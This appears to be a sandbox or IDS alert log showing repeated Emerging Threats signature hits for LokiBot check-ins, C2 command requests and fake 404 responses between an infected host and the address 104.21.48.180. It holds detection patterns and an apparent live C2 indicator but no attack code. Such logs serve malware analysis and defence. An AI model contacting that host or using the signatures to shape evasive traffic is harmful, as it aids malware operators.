                        2025-02-20T16:17:32.950587+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550054104.21.48.180TCP
                        2025-02-20T16:17:32.950587+01002025381ET MALWARE LokiBot Checkin1192.168.2.550054104.21.48.180TCP
                        2025-02-20T16:17:32.950587+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550054104.21.48.180TCP
                        2025-02-20T16:17:33.773219+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550054104.21.48.180TCP
                        2025-02-20T16:17:33.773219+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550054104.21.48.180TCP
                        2025-02-20T16:17:33.778332+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550054TCP
                        2025-02-20T16:17:33.944204+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550055104.21.48.180TCP
                        2025-02-20T16:17:33.944204+01002025381ET MALWARE LokiBot Checkin1192.168.2.550055104.21.48.180TCP
                        2025-02-20T16:17:33.944204+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550055104.21.48.180TCP
                        2025-02-20T16:17:34.768951+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550055104.21.48.180TCP
                        2025-02-20T16:17:34.768951+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550055104.21.48.180TCP
                        2025-02-20T16:17:34.773980+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550055TCP
                        2025-02-20T16:17:34.925143+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550056104.21.48.180TCP
                        2025-02-20T16:17:34.925143+01002025381ET MALWARE LokiBot Checkin1192.168.2.550056104.21.48.180TCP
                        2025-02-20T16:17:34.925143+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550056104.21.48.180TCP
                        2025-02-20T16:17:35.570863+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550056104.21.48.180TCP
                        2025-02-20T16:17:35.570863+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550056104.21.48.180TCP
                        2025-02-20T16:17:35.575911+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550056TCP
                        2025-02-20T16:17:35.739092+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550057104.21.48.180TCP
                        2025-02-20T16:17:35.739092+01002025381ET MALWARE LokiBot Checkin1192.168.2.550057104.21.48.180TCP
                        2025-02-20T16:17:35.739092+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550057104.21.48.180TCP
                        2025-02-20T16:17:36.546997+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550057104.21.48.180TCP
                        2025-02-20T16:17:36.546997+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550057104.21.48.180TCP
                        2025-02-20T16:17:36.552241+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550057TCP
                        2025-02-20T16:17:36.711985+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550058104.21.48.180TCP
                        2025-02-20T16:17:36.711985+01002025381ET MALWARE LokiBot Checkin1192.168.2.550058104.21.48.180TCP
                        2025-02-20T16:17:36.711985+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550058104.21.48.180TCP
                        2025-02-20T16:17:37.519267+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550058104.21.48.180TCP
                        2025-02-20T16:17:37.519267+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550058104.21.48.180TCP
                        2025-02-20T16:17:37.524642+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550058TCP
                        2025-02-20T16:17:37.679673+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550059104.21.48.180TCP
                        2025-02-20T16:17:37.679673+01002025381ET MALWARE LokiBot Checkin1192.168.2.550059104.21.48.180TCP
                        2025-02-20T16:17:37.679673+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550059104.21.48.180TCP
                        2025-02-20T16:17:38.446103+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550059104.21.48.180TCP
                        2025-02-20T16:17:38.446103+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550059104.21.48.180TCP
                        2025-02-20T16:17:38.451084+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550059TCP
                        2025-02-20T16:17:38.635771+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550060104.21.48.180TCP
                        2025-02-20T16:17:38.635771+01002025381ET MALWARE LokiBot Checkin1192.168.2.550060104.21.48.180TCP
                        2025-02-20T16:17:38.635771+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550060104.21.48.180TCP
                        2025-02-20T16:17:39.299101+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550060104.21.48.180TCP
                        2025-02-20T16:17:39.299101+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550060104.21.48.180TCP
                        2025-02-20T16:17:39.305972+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550060TCP
                        2025-02-20T16:17:39.646426+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550061104.21.48.180TCP
                        2025-02-20T16:17:39.646426+01002025381ET MALWARE LokiBot Checkin1192.168.2.550061104.21.48.180TCP
                        2025-02-20T16:17:39.646426+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550061104.21.48.180TCP
                        2025-02-20T16:17:40.423414+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550061104.21.48.180TCP
                        2025-02-20T16:17:40.423414+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550061104.21.48.180TCP
                        2025-02-20T16:17:40.428475+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550061TCP
                        2025-02-20T16:17:40.622099+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550062104.21.48.180TCP
                        2025-02-20T16:17:40.622099+01002025381ET MALWARE LokiBot Checkin1192.168.2.550062104.21.48.180TCP
                        2025-02-20T16:17:40.622099+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550062104.21.48.180TCP
                        2025-02-20T16:17:41.395216+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550062104.21.48.180TCP
                        2025-02-20T16:17:41.395216+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550062104.21.48.180TCP
                        2025-02-20T16:17:41.400197+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550062TCP
                        2025-02-20T16:17:41.551088+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550063104.21.48.180TCP
                        2025-02-20T16:17:41.551088+01002025381ET MALWARE LokiBot Checkin1192.168.2.550063104.21.48.180TCP
                        2025-02-20T16:17:41.551088+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550063104.21.48.180TCP
                        2025-02-20T16:17:42.343321+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550063104.21.48.180TCP
                        2025-02-20T16:17:42.343321+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550063104.21.48.180TCP
                        2025-02-20T16:17:42.349465+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550063TCP
                        2025-02-20T16:17:42.520135+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550064104.21.48.180TCP
                        2025-02-20T16:17:42.520135+01002025381ET MALWARE LokiBot Checkin1192.168.2.550064104.21.48.180TCP
                        2025-02-20T16:17:42.520135+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550064104.21.48.180TCP
                        2025-02-20T16:17:43.283158+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550064104.21.48.180TCP
                        2025-02-20T16:17:43.283158+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550064104.21.48.180TCP
                        2025-02-20T16:17:43.288988+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550064TCP
                        2025-02-20T16:17:43.453546+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550065104.21.48.180TCP
                        2025-02-20T16:17:43.453546+01002025381ET MALWARE LokiBot Checkin1192.168.2.550065104.21.48.180TCP
                        2025-02-20T16:17:43.453546+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550065104.21.48.180TCP
                        2025-02-20T16:17:44.087718+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550065104.21.48.180TCP
                        2025-02-20T16:17:44.087718+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550065104.21.48.180TCP
                        2025-02-20T16:17:44.092797+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550065TCP
                        2025-02-20T16:17:44.274483+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550066104.21.48.180TCP
                        2025-02-20T16:17:44.274483+01002025381ET MALWARE LokiBot Checkin1192.168.2.550066104.21.48.180TCP
                        2025-02-20T16:17:44.274483+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550066104.21.48.180TCP
                        2025-02-20T16:17:45.070504+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550066104.21.48.180TCP
                        2025-02-20T16:17:45.070504+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550066104.21.48.180TCP
                        2025-02-20T16:17:45.075563+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550066TCP
                        2025-02-20T16:17:45.242709+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550067104.21.48.180TCP
                        2025-02-20T16:17:45.242709+01002025381ET MALWARE LokiBot Checkin1192.168.2.550067104.21.48.180TCP
                        2025-02-20T16:17:45.242709+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550067104.21.48.180TCP
                        2025-02-20T16:17:45.966563+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550067104.21.48.180TCP
                        2025-02-20T16:17:45.966563+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550067104.21.48.180TCP
                        2025-02-20T16:17:46.147396+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550068104.21.48.180TCP
                        2025-02-20T16:17:46.147396+01002025381ET MALWARE LokiBot Checkin1192.168.2.550068104.21.48.180TCP
                        2025-02-20T16:17:46.147396+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550068104.21.48.180TCP
                        2025-02-20T16:17:46.958013+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550068104.21.48.180TCP
                        2025-02-20T16:17:46.958013+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550068104.21.48.180TCP
                        2025-02-20T16:17:46.963109+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550068TCP
                        2025-02-20T16:17:47.121340+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550069104.21.48.180TCP
                        2025-02-20T16:17:47.121340+01002025381ET MALWARE LokiBot Checkin1192.168.2.550069104.21.48.180TCP
                        2025-02-20T16:17:47.121340+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550069104.21.48.180TCP
                        2025-02-20T16:17:47.740003+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550069104.21.48.180TCP
                        2025-02-20T16:17:47.740003+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550069104.21.48.180TCP
                        2025-02-20T16:17:47.745133+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550069TCP
                        2025-02-20T16:17:47.916673+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550070104.21.48.180TCP
                        2025-02-20T16:17:47.916673+01002025381ET MALWARE LokiBot Checkin1192.168.2.550070104.21.48.180TCP
                        2025-02-20T16:17:47.916673+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550070104.21.48.180TCP
                        2025-02-20T16:17:48.738143+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550070104.21.48.180TCP
                        2025-02-20T16:17:48.738143+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550070104.21.48.180TCP
                        2025-02-20T16:17:48.743169+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550070TCP
                        2025-02-20T16:17:48.898986+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550071104.21.48.180TCP
                        2025-02-20T16:17:48.898986+01002025381ET MALWARE LokiBot Checkin1192.168.2.550071104.21.48.180TCP
                        2025-02-20T16:17:48.898986+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550071104.21.48.180TCP
                        2025-02-20T16:17:49.634747+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550071104.21.48.180TCP
                        2025-02-20T16:17:49.634747+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550071104.21.48.180TCP
                        2025-02-20T16:17:49.825519+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550072104.21.48.180TCP
                        2025-02-20T16:17:49.825519+01002025381ET MALWARE LokiBot Checkin1192.168.2.550072104.21.48.180TCP
                        2025-02-20T16:17:49.825519+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550072104.21.48.180TCP
                        2025-02-20T16:17:50.613880+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550072104.21.48.180TCP
                        2025-02-20T16:17:50.613880+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550072104.21.48.180TCP
                        2025-02-20T16:17:50.618967+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550072TCP
                        2025-02-20T16:17:50.794615+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550073104.21.48.180TCP
                        2025-02-20T16:17:50.794615+01002025381ET MALWARE LokiBot Checkin1192.168.2.550073104.21.48.180TCP
                        2025-02-20T16:17:50.794615+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550073104.21.48.180TCP
                        2025-02-20T16:17:51.439592+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550073104.21.48.180TCP
                        2025-02-20T16:17:51.439592+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550073104.21.48.180TCP
                        2025-02-20T16:17:51.445141+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550073TCP
                        2025-02-20T16:17:51.615187+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550074104.21.48.180TCP
                        2025-02-20T16:17:51.615187+01002025381ET MALWARE LokiBot Checkin1192.168.2.550074104.21.48.180TCP
                        2025-02-20T16:17:51.615187+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550074104.21.48.180TCP
                        2025-02-20T16:17:52.424115+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550074104.21.48.180TCP
                        2025-02-20T16:17:52.424115+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550074104.21.48.180TCP
                        2025-02-20T16:17:52.429279+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550074TCP
                        2025-02-20T16:17:52.600140+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550075104.21.48.180TCP
                        2025-02-20T16:17:52.600140+01002025381ET MALWARE LokiBot Checkin1192.168.2.550075104.21.48.180TCP
                        2025-02-20T16:17:52.600140+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550075104.21.48.180TCP
                        2025-02-20T16:17:53.410139+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550075104.21.48.180TCP
                        2025-02-20T16:17:53.410139+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550075104.21.48.180TCP
                        2025-02-20T16:17:53.415943+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550075TCP
                        2025-02-20T16:17:53.569529+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550076104.21.48.180TCP
                        2025-02-20T16:17:53.569529+01002025381ET MALWARE LokiBot Checkin1192.168.2.550076104.21.48.180TCP
                        2025-02-20T16:17:53.569529+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550076104.21.48.180TCP
                        2025-02-20T16:17:54.384273+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550076104.21.48.180TCP
                        2025-02-20T16:17:54.384273+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550076104.21.48.180TCP
                        2025-02-20T16:17:54.389729+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550076TCP
                        2025-02-20T16:17:54.551208+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550077104.21.48.180TCP
                        2025-02-20T16:17:54.551208+01002025381ET MALWARE LokiBot Checkin1192.168.2.550077104.21.48.180TCP
                        2025-02-20T16:17:54.551208+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550077104.21.48.180TCP
                        2025-02-20T16:17:55.222106+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550077104.21.48.180TCP
                        2025-02-20T16:17:55.222106+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550077104.21.48.180TCP
                        2025-02-20T16:17:55.227156+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550077TCP
                        2025-02-20T16:17:55.378087+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550078104.21.48.180TCP
                        2025-02-20T16:17:55.378087+01002025381ET MALWARE LokiBot Checkin1192.168.2.550078104.21.48.180TCP
                        2025-02-20T16:17:55.378087+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550078104.21.48.180TCP
                        2025-02-20T16:17:56.170636+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550078104.21.48.180TCP
                        2025-02-20T16:17:56.170636+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550078104.21.48.180TCP
                        2025-02-20T16:17:56.178269+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550078TCP
                        2025-02-20T16:17:56.343098+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550079104.21.48.180TCP
                        2025-02-20T16:17:56.343098+01002025381ET MALWARE LokiBot Checkin1192.168.2.550079104.21.48.180TCP
                        2025-02-20T16:17:56.343098+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550079104.21.48.180TCP
                        2025-02-20T16:17:56.990527+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550079104.21.48.180TCP
                        2025-02-20T16:17:56.990527+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550079104.21.48.180TCP
                        2025-02-20T16:17:56.996003+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550079TCP
                        2025-02-20T16:17:57.170825+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550080104.21.48.180TCP
                        2025-02-20T16:17:57.170825+01002025381ET MALWARE LokiBot Checkin1192.168.2.550080104.21.48.180TCP
                        2025-02-20T16:17:57.170825+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550080104.21.48.180TCP
                        2025-02-20T16:17:57.950763+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550080104.21.48.180TCP
                        2025-02-20T16:17:57.950763+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550080104.21.48.180TCP
                        2025-02-20T16:17:57.955787+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550080TCP
                        2025-02-20T16:17:58.135758+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550081104.21.48.180TCP
                        2025-02-20T16:17:58.135758+01002025381ET MALWARE LokiBot Checkin1192.168.2.550081104.21.48.180TCP
                        2025-02-20T16:17:58.135758+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550081104.21.48.180TCP
                        2025-02-20T16:17:58.792069+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550081104.21.48.180TCP
                        2025-02-20T16:17:58.792069+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550081104.21.48.180TCP
                        2025-02-20T16:17:58.797121+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550081TCP
                        2025-02-20T16:17:58.954650+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550082104.21.48.180TCP
                        2025-02-20T16:17:58.954650+01002025381ET MALWARE LokiBot Checkin1192.168.2.550082104.21.48.180TCP
                        2025-02-20T16:17:58.954650+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550082104.21.48.180TCP
                        2025-02-20T16:17:59.769874+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550082104.21.48.180TCP
                        2025-02-20T16:17:59.769874+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550082104.21.48.180TCP
                        2025-02-20T16:17:59.774869+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550082TCP
                        2025-02-20T16:17:59.930325+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550083104.21.48.180TCP
                        2025-02-20T16:17:59.930325+01002025381ET MALWARE LokiBot Checkin1192.168.2.550083104.21.48.180TCP
                        2025-02-20T16:17:59.930325+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550083104.21.48.180TCP
                        2025-02-20T16:18:00.585095+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550083104.21.48.180TCP
                        2025-02-20T16:18:00.585095+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550083104.21.48.180TCP
                        2025-02-20T16:18:00.590127+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550083TCP
                        2025-02-20T16:18:00.765832+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550084104.21.48.180TCP
                        2025-02-20T16:18:00.765832+01002025381ET MALWARE LokiBot Checkin1192.168.2.550084104.21.48.180TCP
                        2025-02-20T16:18:00.765832+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550084104.21.48.180TCP
                        2025-02-20T16:18:01.673948+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550084104.21.48.180TCP
                        2025-02-20T16:18:01.673948+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550084104.21.48.180TCP
                        2025-02-20T16:18:01.679001+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550084TCP
                        2025-02-20T16:18:01.842155+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550085104.21.48.180TCP
                        2025-02-20T16:18:01.842155+01002025381ET MALWARE LokiBot Checkin1192.168.2.550085104.21.48.180TCP
                        2025-02-20T16:18:01.842155+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550085104.21.48.180TCP
                        2025-02-20T16:18:02.527456+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550085104.21.48.180TCP
                        2025-02-20T16:18:02.527456+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550085104.21.48.180TCP
                        2025-02-20T16:18:02.532491+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550085TCP
                        2025-02-20T16:18:02.698380+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550086104.21.48.180TCP
                        2025-02-20T16:18:02.698380+01002025381ET MALWARE LokiBot Checkin1192.168.2.550086104.21.48.180TCP
                        2025-02-20T16:18:02.698380+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550086104.21.48.180TCP
                        2025-02-20T16:18:03.377232+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550086104.21.48.180TCP
                        2025-02-20T16:18:03.377232+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550086104.21.48.180TCP
                        2025-02-20T16:18:03.382311+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550086TCP
                        2025-02-20T16:18:03.548403+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550087104.21.48.180TCP
                        2025-02-20T16:18:03.548403+01002025381ET MALWARE LokiBot Checkin1192.168.2.550087104.21.48.180TCP
                        2025-02-20T16:18:03.548403+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550087104.21.48.180TCP
                        2025-02-20T16:18:04.336245+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550087104.21.48.180TCP
                        2025-02-20T16:18:04.336245+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550087104.21.48.180TCP
                        2025-02-20T16:18:04.341330+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550087TCP
                        2025-02-20T16:18:04.511337+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550088104.21.48.180TCP
                        2025-02-20T16:18:04.511337+01002025381ET MALWARE LokiBot Checkin1192.168.2.550088104.21.48.180TCP
                        2025-02-20T16:18:04.511337+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550088104.21.48.180TCP
                        2025-02-20T16:18:05.259144+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550088104.21.48.180TCP
                        2025-02-20T16:18:05.259144+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550088104.21.48.180TCP
                        2025-02-20T16:18:05.453021+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550089104.21.48.180TCP
                        2025-02-20T16:18:05.453021+01002025381ET MALWARE LokiBot Checkin1192.168.2.550089104.21.48.180TCP
                        2025-02-20T16:18:05.453021+01002825766ETPRO MALWARE LokiBot Checkin M2